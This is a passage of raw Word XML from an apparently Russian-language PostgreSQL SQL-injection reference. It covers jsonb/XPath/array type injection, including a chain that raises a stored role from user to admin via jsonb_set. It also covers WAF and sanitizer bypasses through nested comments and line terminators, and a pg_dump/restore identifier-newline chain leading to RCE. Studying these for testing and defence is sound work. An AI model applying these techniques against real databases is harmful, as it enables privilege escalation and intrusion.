        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — главный leak-mechanism для 3.11.1, 3.11.2 cast confusion, 3.11.3 xpath-syntax-error.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альтернатива через 3.11.1 short-circuit или 3.11.3 xpath_exists.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 (OOB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не пересекается с 3.11.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что XXE в PG закрыт.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 (Metadata)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комбо для recon: 3.11.2 path-traversal в jsonb-документах application, 3.11.3 структура XML-документов.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(Filter bypass)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обход WAF на specific keywords внутри type-injection context (3.9.5 hex для подмены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 в JSONPath; 3.9.6 whitespace в array-literal).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 (CTE-based)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комбо 3.11 + 3.10.1: array-injection (3.11.4) + DML в CTE (3.10.1) для write-effect через type-injection entry point.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комбо 3.11.2 + 3.10.1: JSON-документ с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"role": "user"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → атакующий обновляет до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"role": "admin"</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jsonb_set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в DML-CTE.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внутри функций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%s', json_path_var)</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 то же type-confusion с identifier.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(Validation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практическая защита: schema-validation для JSON paths и XPath expressions, typed array bind через driver, whitelist для всех runtime DSL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.11 — категория про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">core PG type system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который provider-managed не модифицируют. Все 4 подраздела работают на AWS RDS / Google Cloud SQL / Supabase </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">идентично</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> self-hosted: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3.11.1 BOOLEAN coercion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — фича core type system; никаких provider-уровневых ограничений.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3.11.2 jsonb operators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — встроенные операторы; работают везде. PG 12+ JSONPath доступен на всех managed (если основная версия ≥ 12).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3.11.3 XML/XPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — libxml2 обязательная зависимость PG; managed-провайдеры включают её всегда. CVE-2017-7484 фикс — встроен в core, не отключаем; XXE на managed-PG тоже невозможен.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3.11.4 Arrays</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — core feature, работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Один важный нюанс — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Supabase PostgREST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: REST-DSL транслирует HTTP-параметры в PG-запросы. Использует jsonb-операторы внутри (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?role=eq.admin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WHERE role = 'admin'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?metadata-&gt;&gt;field=eq.value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WHERE metadata-&gt;&gt;'field' = 'value'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Здесь jsonb-injection (3.11.2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">может проходить через PostgREST DSL без фильтрации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, если приложение использует raw RPC-функции с jsonb-аргументами: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PostgREST sanitizes URL-paths базово (URL-encoding), но не валидирует semantic of jsonb-path inside the value.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RPC-функции (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /rpc/my_func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) с JSON body → jsonb-аргументы → внутри plpgsql-функция может конкатенировать в SQL → 3.11.2 + 3.16.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.11.3 на Supabase PostgREST почти не применимо — XML-функции там редко используются.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Детально по managed-провайдерам — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для self-разведки на текущем кластере: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT version()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для базовой версии (3.8.4 Payload A), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM pg_extension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для дополнительных JSON/XML-расширений.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.12.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.12 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG-специфичные особенности парсера комментариев и обработки whitespace в идентификаторах</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, которые создают edge case-классы атак, не сводимые к классическому injection. Это три отдельных механизма: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Вложенные block-комментарии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outer /* inner */ ... */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — PG один из немногих SQL-парсеров, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">корректно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обрабатывает вложенность. Sanitizer-ы, написанные под общую SQL-семантику (где первый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закрывает комментарий), отстают по семантике от PG. Атакующий проталкивает payload через гэп.</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Однострочные комментарии `--` + `\r`/`\n`/`\r\n`-line terminator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — PG считает концом строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">любой из</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независимо. Sanitizer-ы часто нормализуют line-endings к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оставляя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как обычный байт; payload с одним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обходит фильтр, но в PG комментарий обрывается.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Newline (`\n`/`\r`) внутри identifier-а</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — корректно quoted-identifier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допускает любые байты, включая newline. При сериализации через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это попадает в dump-script как часть SQL-комментария → разрывает комментарий при restore → SQL injection / RCE на client-host. Это регрессионный класс CVE: оригинал — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2012-0868</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, регрессия в 2025 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-8715</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (R25).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Где это пересекается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3.9.6 (Whitespace tricks)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — там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используется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">whitespace-эквивалент</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> между токенами для обхода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-regex в WAF. Здесь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 атака на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">семантику</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> парсера комментариев, разная по цели и механике. Закреплено в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conventions.md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обхода whitespace-фильтра — в 3.9.6;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как nested-form — в 3.12.1.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3.9.0 (WAF 3.9-категории)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — содержит правило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(любые SQL-комментарии). 3.12 — про обход именно этого правила и про edge case-формы, которые WAF-pattern не учитывает.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newline в identifier через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%I', value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> пересекается с 3.12.3 на серверной стороне; 3.12.3 фокусируется на client-side chain через pg_dump/restore.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 — CVE-2025-8715 целиком разбирается там; в 3.12.3 — фокус на сам класс атаки и применимость.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Общая модель уязвимости 3.12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.12.1 и 3.12.2 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">input-фильтр-bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: атакующий передаёт payload, который sanitizer/WAF трактует как ничем не опасный (комментарий или whitespace), но PG-парсер видит активный SQL. То есть это close родственники 3.9 (filter bypass), но через специфику lexer-edge cases, не encoding tricks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.12.3 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">client-side chain через persistent state</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: атакующий создаёт объект в БД с опасным именем (даже через legitimate-операцию </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 и payload активируется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">позже</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, когда DBA запускает pg_dump → pg_restore на другом хосте. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
